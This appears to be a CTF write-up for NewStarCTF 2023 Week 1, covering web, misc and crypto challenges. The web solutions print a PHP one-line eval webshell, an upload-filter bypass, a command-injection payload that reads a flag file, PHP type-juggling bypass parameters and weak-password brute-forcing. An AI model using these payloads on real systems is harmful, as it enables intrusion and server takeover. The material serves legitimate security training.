NewStarCTF 2023
Week 1
Web
Leaked Secret
My first guess was a leaked www.zip backup.
Download it and open it, and the flag is inside.
Begin of Upload
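A file upload challenge; try uploading a simple one-line webshell.
The front end filters on the file extension.
Upload it as a png, then intercept the request in Burp Suite and change the extension.
This returns the path: Uploaded File: /upload/1.php
Connect with AntSword to get the flag.
One-line webshell: <?php @eval($_POST['shell']);?>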
Begin of HTTP
Follow the hints and change the HTTP request headers one step at a time.
Note that the "local" requirement here has to be met with X-Real-IP: 127.0.0.1
POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:25546
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: NewStarCTF2023
Referer: newstarctf.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: power=ctfer
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 28
X-Real-IP: 127.0.0.1

secret=n3wst4rCTF2023g00000d
ErrorFlask
The challenge asks for number1 and number2; pass arbitrary values to trigger an error.
number1=1&number=a
Begin of PHP
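level1 and level2 can both be bypassed with arrays; in level3, strcmp returns 0 for an array that is passed in; level4 can be bypassed with %00 truncation, which leaves the comparison unaffected; for level5, pass any character that is not filtered.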
http://57773d22-93ca-486d-9a55-4619819d247f.node4.buuoj.cn:81/?key1[]=1&key2[]=2&key4[]=1&key5=2024%00
POST parameters: key3[]=_&flag5=^
R!C!E!
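MD5 collision, plus variable-name and keyword bypasses.
The content after echo has to be wrapped in backticks; they are left out here because this was written in markdown.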
password=v9BTpRL3pLSlBA3pID9b&e[v.a.l=echo c\at /fl\ag;
EasyLogin
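Register and log in with any account, and you will see a 302 redirect that contains a fake flag.
The login page also hints at brute-forcing a weak password, so the guess is to brute-force the weak password of the admin account.
The password that finally worked is 000000.
Then log in and look at the 302 redirect for admin
to get the flag.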
Misc
CyberChef's Secret
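Drop the encoded text from the file into CyberChef and the answer comes out.
Secret Image
The QR code provided scans to nothing.
In the end I tried zsteg.
Traffic! Shark!
Opening the capture shows that almost every request is a 404, so filter for the 200 responses.
One of them contains a base64 string.
Decode it to get the flag.
Archives
We are given an odd file; viewing it in WinHex shows that it has no file header, so change the file header to 504B0304.
Then brute-force the six-digit numeric password, following the hint decoded from the base encoding.
My copy reported an archive error, and I did not bother downloading a more fault-tolerant archive tool; the principle is simple, and knowing the principle is enough.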
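The header repair described above, as an added example that is not part of the original write-up. The ZIP is a constructed in-memory sample, and the damage model (only the first four bytes overwritten) is an assumption about the challenge file.

```python
import io
import zipfile
from typing import Optional

ZIP_LOCAL_MAGIC = bytes.fromhex("504B0304")  # "PK\x03\x04", the value from the write-up


def build_sample_zip() -> bytes:
    """Constructed sample: a small in-memory ZIP standing in for the challenge file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("hint.txt", "constructed sample content")
    return buf.getvalue()


def strip_magic(data: bytes) -> bytes:
    """Assumed damage model: only the first four bytes were overwritten."""
    return b"\x00" * 4 + data[4:]


def looks_like_headless_zip(data: bytes) -> bool:
    """Leading magic is wrong, yet central directory and end record are still there."""
    return (data[:4] != ZIP_LOCAL_MAGIC
            and b"PK\x01\x02" in data
            and b"PK\x05\x06" in data[-66000:])


def repair_header(data: bytes) -> bytes:
    """Restore the local file header signature at offset 0."""
    return ZIP_LOCAL_MAGIC + data[4:]


def first_bad_member(data: bytes) -> Optional[str]:
    """Name of the first member that fails its header/CRC check, or None if all pass."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.testzip()


if __name__ == "__main__":
    damaged = strip_magic(build_sample_zip())
    print("headless zip:", looks_like_headless_zip(damaged))
    print("bad member before repair:", first_bad_member(damaged))
    print("bad member after repair:", first_bad_member(repair_header(damaged)))
```

The central directory at the end of the file is what lets a reader still list members of a headless archive; extraction fails only when the local header signature is checked.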
Whitespace
This is the WhiteSpace language; paste it into the website to get the flag.
https://vii5ard.github.io/whitespace/
Hidden Eyes
Learned a new tool: SilentEye
Load the file into it and decode.
Crypto
brainfuck
Paste it into the website to decode.
https://www.splitbrain.org/services/ook
Caesar's Secert
The title suggests a Caesar cipher.
Enumerate the shifts to get the result (I tested afterwards: the offset is 5).
Fence
Rail fence cipher decryption.
Vigenère
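Vigenère decryption.
The key is unknown, but the first four characters of the ciphertext should correspond to flag; by inspection the key is kfc.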
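The known-prefix reasoning above, as an added example that is not from the original write-up. The ciphertext is a constructed sample (the challenge ciphertext is not on this page), and the convention that non-letters do not advance the key is an assumption.

```python
def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Classic Vigenère over A-Z/a-z; other characters pass through and
    do not advance the key (assumed convention for this example)."""
    out, i = [], 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[i % len(key)]) - ord("a")
            out.append(chr((ord(ch) - base + (-shift if decrypt else shift)) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def keystream_from_crib(ciphertext: str, crib: str) -> str:
    """Key letters implied by a known plaintext prefix (letters only)."""
    pairs = zip(ciphertext.lower(), crib.lower())
    return "".join(chr((ord(c) - ord(p)) % 26 + ord("a")) for c, p in pairs)


def shortest_period(stream: str) -> str:
    """Smallest prefix that, repeated, reproduces the observed key stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


# Constructed sample (not the challenge ciphertext), encrypted with the key from the write-up.
SAMPLE_PLAINTEXT = "flag{constructed_sample_text}"
SAMPLE_CIPHERTEXT = vigenere(SAMPLE_PLAINTEXT, "kfc")


def recover(ciphertext: str, crib: str = "flag"):
    """Derive the key from the crib, then decrypt the whole ciphertext with it."""
    stream = keystream_from_crib(ciphertext, crib)   # "kfck" for the sample
    key = shortest_period(stream)                    # "kfc"
    return key, vigenere(ciphertext, key, decrypt=True)


if __name__ == "__main__":
    print(SAMPLE_CIPHERTEXT)
    print(recover(SAMPLE_CIPHERTEXT))
```

A four-letter crib fixes only four key letters, so the recovered period should be confirmed by checking that the full decryption reads as text.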
babyencoding
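The ciphertext has three parts; the first two can be decoded directly in CyberChef.
The third taught me something new: it is UUencode encoding.
Concatenate the parts to get the flag.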
babyrsa
You need some background on how RSA works first.
We can see that n is the product of 15 primes,
so n can be factored:
http://www.factordb.com/index.php
After that, write a script to get the answer.
from Crypto.Util.number import *
n=17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c=14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
factor=[2217990919,2338725373,2370292207,2463878387,2706073949,2794985117,2804303069,2923072267,2970591037,3207148519,3654864131,3831680819,3939901243,4093178561,4278428893]
phi=1
e=65537
for i in factor:
    phi*=i-1
d=inverse(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
#b'flag{us4_s1ge_t0_cal_phI}'
Small d
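New knowledge acquired!!!
When e is very large and d is very small, this is the low decryption exponent attack.
The script is as follows: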
import gmpy2
from Crypto.Util.number import *
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
def continuedFra(x, y):
    # Partial quotients of the continued-fraction expansion of x / y
    cF = []
    while y:
        cF.append(x // y)
        x, y = y, x % y
    return cF

def Simplify(ctnf):
    # Fold partial quotients back into a fraction; for e/n this yields (d, k)
    numerator = 0
    denominator = 1
    for x in ctnf[::-1]:
        numerator, denominator = denominator, x * denominator + numerator
    return (numerator, denominator)

def calculateFrac(x, y):
    # All convergents of x / y, each as a (d, k) candidate pair
    cF = continuedFra(x, y)
    cF = list(map(Simplify, (cF[0:i] for i in range(1, len(cF)))))
    return cF

def solve_pq(a, b, c):
    # Integer roots of a*x^2 + b*x + c; (0, 0) when the discriminant is negative
    disc = b * b - 4 * a * c
    if disc < 0:
        return 0, 0
    par = gmpy2.isqrt(disc)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)

def wienerAttack(e, n):
    for (d, k) in calculateFrac(e, n):
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            continue
        # Candidate phi; p and q are then the roots of x^2 - (n - phi + 1)x + n
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return abs(int(p)), abs(int(q))
    print('[!]not find!')
    return None, None

def wienerAttackMain(n, e, c):
    p, q = wienerAttack(e, n)
    if p is None:
        return None
    print('[+]Found!')
    print(' [-]p =',p)
    print(' [-]q =',q)
    print(' [-]n =',p*q)
    d = gmpy2.invert(e,(p-1)*(q-1))
    print(' [-]d =', d)
    m = pow(c,d,p*q)
    print(' [-]m =',m)
    print(' [-]flag =',long_to_bytes(m))
    print('[!]All Done!')
    return m

wienerAttackMain(n,e,c)
#flag = b'flag{learn_some_continued_fraction_technique#dc16885c}'
babyxor
I had a look at 椰奶师傅's writeup.
Use the property of XOR, a^b^b=a, and guess that the answer starts with flag.
Using this, the key can be recovered.
cipher='e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
cipher=bytes.fromhex(cipher)
print(cipher)
# Inspect the key
for i in range(4):
    print(b'flag'[i]^cipher[i])
flag = [143 ^ i for i in cipher]
print(bytes(flag))
#b'flag{x0r_15_symm3try_and_e4zy!!!!!!}'